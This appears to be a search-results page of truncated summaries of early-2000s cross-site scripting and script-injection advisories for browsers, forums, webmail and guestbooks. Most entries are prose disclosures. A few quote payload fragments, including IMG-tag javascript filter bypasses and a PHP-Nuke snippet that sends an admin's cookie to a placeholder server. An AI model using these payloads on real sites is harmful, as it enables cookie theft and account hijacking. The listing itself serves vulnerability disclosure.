5006 matches found
Microsoft Internet Explorer 5 - ShowHelp Arbitrary Command Execution
source: https://www.securityfocus.com/bid/6780/info Microsoft Internet Explorer implements the showHelp function as a means of displaying help content contained in HTML pages. However, this function is capable of performing too...
CVE-2002-1931
Cross-site scripting (XSS) vulnerability in PHP Arena paFileDB 1.1.3 and 2.1.1 allows remote attackers to inject arbitrary web script or HTML via Javascript in the search string...
Microsoft IIS IDC Extension XSS
This IIS Server appears to be vulnerable to a cross-site scripting attack due to an error in the handling of overly-long requests on an idc file. It is possible to inject JavaScript in the URL, which will appear in the resulting page. This script was written by Geoffroy Raimbau...
SECURITY.NNOV: ikonboard 3.1.1 CSS
Dear bugtraq@, Ikonboard CSS bug via IMG tag was reported long time ago for 3.0.x. The only change in Ikonboard 3.1.1 at least on sending private messages is it checks URL extension to be .gif or .jpg, so IMGjavascript:alertdocument.cookie.gif/IMG still works perfectly.... Sorry if it was already...
Proxy error messages cross-site scripting
The URL is not escaped in the error message, which makes it possible to inject JavaScript via the URL...
CVE-2002-0738
MHonArc 2.5.2 and earlier does not properly filter Javascript from archived e-mail messages, which could allow remote attackers to execute script in web clients by (1) splitting the SCRIPT tag into smaller pieces, (2) including the script in a SRC argument to an IMG tag, or (3) using "&=script" syntax...
Opera 6.0.x - FTP View Cross-Site Scripting
source: https://www.securityfocus.com/bid/5401/info A cross-site scripting vulnerability in Opera has been reported. When viewing the contents of an FTP site as web content, the data within tags is not sanitized. An attacker may embed javascript between...
Mozilla 1.0/1.1 - FTP View Cross-Site Scripting
source: https://www.securityfocus.com/bid/5403/info A cross-site scripting vulnerability in Mozilla has been reported. When viewing the contents of an FTP site as web content from an ftp:// URL, the directory name is included in the HTML representation. It is not adequately sanitized before this...
CVE-2001-1084
Cross-site scripting vulnerability in Allaire JRun 3.0 and 2.3.3 allows a malicious webmaster to embed Javascript in a request for a .JSP, .shtml, .jsp10, .jrun, or .thtml file that does not exist, which causes the Javascript to be inserted into an error message...
Levcgi.com's MyGuestbook JavaScript Injection Vulnerability
http://rawt.daemon.sh Levcgi.com's MyGuestbook JavaScript Injection Vulnerability Discovered By BrainRawt [email protected] About MyGuestbook: Highly customizable guestbook that...
Microsoft Internet Explorer 5.5/6.0 - History List Script Injection
source: https://www.securityfocus.com/bid/4505/info A vulnerability has been reported in some versions of Internet Explorer. It is possible to inject JavaScript code into the browser history list, and execute it within any page context given appropriate user interaction. Internet Explorer stores...
[Advisory] phpBB 1.4.4 still suffers from Cross Site Scripting Vulnerability
itcp advisory 5 [email protected] http://www.it-checkpoint.net/advisory/5.html March 21th, 2002 phpBB 1.4.4 still suffers from Cross Site Scripting Vulnerability...
[IMG] tag vulnerability in vBulletin
product : vbulletin versions : 2.2.2, 2.2.0 , maybe others. Problem : One knows that if one sends this code in a private message : IMGjavascript:alert'hum';/IMG a space will be placed between "java" and "script". This filter can be bypassed : IMGjavasript:alert'hop';/IMG More details in French...
Vulnerabilities in squirrelmail
Multiple security vulnerabilities exist in SquirrelMail v 1.2.3 that allow malicious HTML messages to: send messages appearing to come from the user; run arbitrary javascript. Description: The compose.php script allows parameters to be passed as GETs. Therefore including the following in ...
Cgisecurity Paper #4: Header Based Exploitation: Web Statistical Software Threats
Hello, Below is a paper I wrote on some threats that web statistical software faces in regards to header manipulation. I've decided to include 1 product affected by this to show that this is very possible. Product: w3perl Vendor: http://www.w3perl.com Patch: http://www.w3perl.com/download/ Upgrad...
Cross-site scripting in Aktivate Shopping System (cross-site scripting)
JavaScript can be inserted into the request URL...
Security hole in IMessenger ( PHP-Nuke )
There is a big hole in imessenger im.php. It accepts javascript... if I send scriptwindow.location.href='http://www. SERVER.com/im.php?usernameto= MYNICK &subject='+ document.cookie +'&message=message&action=send' ;/script without '' to the admin, he sends his cookie. PHPNuke has been alerted...
javascript in gnut (javascript injection)
The name of a shared file can contain HTML tags...
Problems in proxomitron (cross-site scripting)
JavaScript can be inserted into the request URL...